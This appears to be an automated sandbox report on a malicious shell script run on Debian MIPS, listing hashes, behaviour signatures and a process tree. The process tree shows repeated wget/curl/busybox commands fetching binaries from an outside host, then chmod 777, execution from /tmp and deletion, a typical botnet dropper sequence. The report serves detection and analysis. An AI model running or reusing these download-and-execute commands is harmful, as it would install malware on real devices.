Analysis
-
max time kernel
149s -
max time network
155s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
25/10/2024, 01:12
Static task
static1
Behavioral task
behavioral1
Sample
19a71eb81c8fd44171b07fe5b4f687a33a8188058d345e567bea9cae37fcf912.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
19a71eb81c8fd44171b07fe5b4f687a33a8188058d345e567bea9cae37fcf912.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
19a71eb81c8fd44171b07fe5b4f687a33a8188058d345e567bea9cae37fcf912.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
19a71eb81c8fd44171b07fe5b4f687a33a8188058d345e567bea9cae37fcf912.sh
Resource
debian9-mipsel-20240418-en
General
-
Target
19a71eb81c8fd44171b07fe5b4f687a33a8188058d345e567bea9cae37fcf912.sh
-
Size
10KB
-
MD5
f36cbd463f4b21236b1338c03dbfd8e4
-
SHA1
22a27ede29be8ec1c42b17c43a162e2d9ab3a265
-
SHA256
19a71eb81c8fd44171b07fe5b4f687a33a8188058d345e567bea9cae37fcf912
-
SHA512
74f54cf55aaa5b35951ff883a64e3a584f03c6952de36b92558993d20093f641c9f3aab6c7d659cef4c8c0cf84b8762f370d1ed768b48d717f130bd7f6f91e9a
-
SSDEEP
96:Yqin/wN/wN/w7vQ4vxL1VMQWGmXr87XnNHNbNk3WKJUIEBL7XMWxWpWhC+kacagk:C6eET5AQtxk3vJ+tqkotxk3vb36eETGB
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 12 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 829 chmod 874 chmod 881 chmod 889 chmod 740 chmod 750 chmod 809 chmod 816 chmod 854 chmod 867 chmod 732 chmod 795 chmod -
Executes dropped EXE 12 IoCs
ioc pid Process /tmp/3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH 733 3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH /tmp/q8by6B3GMmnW2fqzokCod3DStJogu7sm1h 741 q8by6B3GMmnW2fqzokCod3DStJogu7sm1h /tmp/eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM 751 eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM /tmp/Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd 797 Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd /tmp/SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM 810 SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM /tmp/EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI 817 EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI /tmp/v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG 830 v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG /tmp/GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B 855 GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B /tmp/GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg 868 GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg /tmp/KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj 875 KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj /tmp/IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy 882 IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy /tmp/IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc 890 IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 37 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 753 wget 808 busybox 841 curl 877 wget 880 busybox 812 wget 815 busybox 864 curl 866 busybox 870 wget 892 wget 736 wget 737 curl 743 wget 813 curl 820 curl 851 busybox 885 curl 744 curl 806 curl 834 wget 871 curl 884 wget 709 wget 739 busybox 778 curl 788 busybox 819 wget 873 busybox 803 wget 825 busybox 859 wget 888 busybox 720 curl 731 busybox 749 busybox 878 curl -
Writes file to tmp directory 12 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH curl File opened for modification /tmp/q8by6B3GMmnW2fqzokCod3DStJogu7sm1h curl File opened for modification /tmp/eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM curl File opened for modification /tmp/EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI curl File opened for modification /tmp/KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj curl File opened for modification /tmp/Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd curl File opened for modification /tmp/SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM curl File opened for modification /tmp/v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG curl File opened for modification /tmp/GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B curl File opened for modification /tmp/GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg curl File opened for modification /tmp/IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy curl File opened for modification /tmp/IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc curl
Processes
-
/tmp/19a71eb81c8fd44171b07fe5b4f687a33a8188058d345e567bea9cae37fcf912.sh/tmp/19a71eb81c8fd44171b07fe5b4f687a33a8188058d345e567bea9cae37fcf912.sh1⤵PID:700
-
/bin/rm/bin/rm bins.sh2⤵PID:704
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH2⤵
- System Network Configuration Discovery
PID:709
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:720
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH2⤵
- System Network Configuration Discovery
PID:731
-
-
/bin/chmodchmod 777 3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH2⤵
- File and Directory Permissions Modification
PID:732
-
-
/tmp/3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH./3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH2⤵
- Executes dropped EXE
PID:733
-
-
/bin/rmrm 3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH2⤵PID:735
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/q8by6B3GMmnW2fqzokCod3DStJogu7sm1h2⤵
- System Network Configuration Discovery
PID:736
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/q8by6B3GMmnW2fqzokCod3DStJogu7sm1h2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:737
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/q8by6B3GMmnW2fqzokCod3DStJogu7sm1h2⤵
- System Network Configuration Discovery
PID:739
-
-
/bin/chmodchmod 777 q8by6B3GMmnW2fqzokCod3DStJogu7sm1h2⤵
- File and Directory Permissions Modification
PID:740
-
-
/tmp/q8by6B3GMmnW2fqzokCod3DStJogu7sm1h./q8by6B3GMmnW2fqzokCod3DStJogu7sm1h2⤵
- Executes dropped EXE
PID:741
-
-
/bin/rmrm q8by6B3GMmnW2fqzokCod3DStJogu7sm1h2⤵PID:742
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM2⤵
- System Network Configuration Discovery
PID:743
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:744
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM2⤵
- System Network Configuration Discovery
PID:749
-
-
/bin/chmodchmod 777 eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM2⤵
- File and Directory Permissions Modification
PID:750
-
-
/tmp/eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM./eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM2⤵
- Executes dropped EXE
PID:751
-
-
/bin/rmrm eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM2⤵PID:752
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd2⤵
- System Network Configuration Discovery
PID:753
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:778
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd2⤵
- System Network Configuration Discovery
PID:788
-
-
/bin/chmodchmod 777 Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd2⤵
- File and Directory Permissions Modification
PID:795
-
-
/tmp/Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd./Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd2⤵
- Executes dropped EXE
PID:797
-
-
/bin/rmrm Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd2⤵PID:801
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM2⤵
- System Network Configuration Discovery
PID:803
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:806
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM2⤵
- System Network Configuration Discovery
PID:808
-
-
/bin/chmodchmod 777 SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM2⤵
- File and Directory Permissions Modification
PID:809
-
-
/tmp/SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM./SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM2⤵
- Executes dropped EXE
PID:810
-
-
/bin/rmrm SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM2⤵PID:811
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI2⤵
- System Network Configuration Discovery
PID:812
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:813
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI2⤵
- System Network Configuration Discovery
PID:815
-
-
/bin/chmodchmod 777 EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI2⤵
- File and Directory Permissions Modification
PID:816
-
-
/tmp/EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI./EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI2⤵
- Executes dropped EXE
PID:817
-
-
/bin/rmrm EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI2⤵PID:818
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG2⤵
- System Network Configuration Discovery
PID:819
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:820
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG2⤵
- System Network Configuration Discovery
PID:825
-
-
/bin/chmodchmod 777 v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG2⤵
- File and Directory Permissions Modification
PID:829
-
-
/tmp/v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG./v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG2⤵
- Executes dropped EXE
PID:830
-
-
/bin/rmrm v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG2⤵PID:833
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B2⤵
- System Network Configuration Discovery
PID:834
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:841
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B2⤵
- System Network Configuration Discovery
PID:851
-
-
/bin/chmodchmod 777 GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B2⤵
- File and Directory Permissions Modification
PID:854
-
-
/tmp/GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B./GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B2⤵
- Executes dropped EXE
PID:855
-
-
/bin/rmrm GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B2⤵PID:858
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg2⤵
- System Network Configuration Discovery
PID:859
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:864
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg2⤵
- System Network Configuration Discovery
PID:866
-
-
/bin/chmodchmod 777 GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg2⤵
- File and Directory Permissions Modification
PID:867
-
-
/tmp/GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg./GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg2⤵
- Executes dropped EXE
PID:868
-
-
/bin/rmrm GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg2⤵PID:869
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj2⤵
- System Network Configuration Discovery
PID:870
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:871
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj2⤵
- System Network Configuration Discovery
PID:873
-
-
/bin/chmodchmod 777 KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj2⤵
- File and Directory Permissions Modification
PID:874
-
-
/tmp/KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj./KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj2⤵
- Executes dropped EXE
PID:875
-
-
/bin/rmrm KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj2⤵PID:876
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy2⤵
- System Network Configuration Discovery
PID:877
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:878
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy2⤵
- System Network Configuration Discovery
PID:880
-
-
/bin/chmodchmod 777 IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy2⤵
- File and Directory Permissions Modification
PID:881
-
-
/tmp/IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy./IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy2⤵
- Executes dropped EXE
PID:882
-
-
/bin/rmrm IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy2⤵PID:883
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc2⤵
- System Network Configuration Discovery
PID:884
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:885
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc2⤵
- System Network Configuration Discovery
PID:888
-
-
/bin/chmodchmod 777 IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc2⤵
- File and Directory Permissions Modification
PID:889
-
-
/tmp/IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc./IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc2⤵
- Executes dropped EXE
PID:890
-
-
/bin/rmrm IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc2⤵PID:891
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF52⤵
- System Network Configuration Discovery
PID:892
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97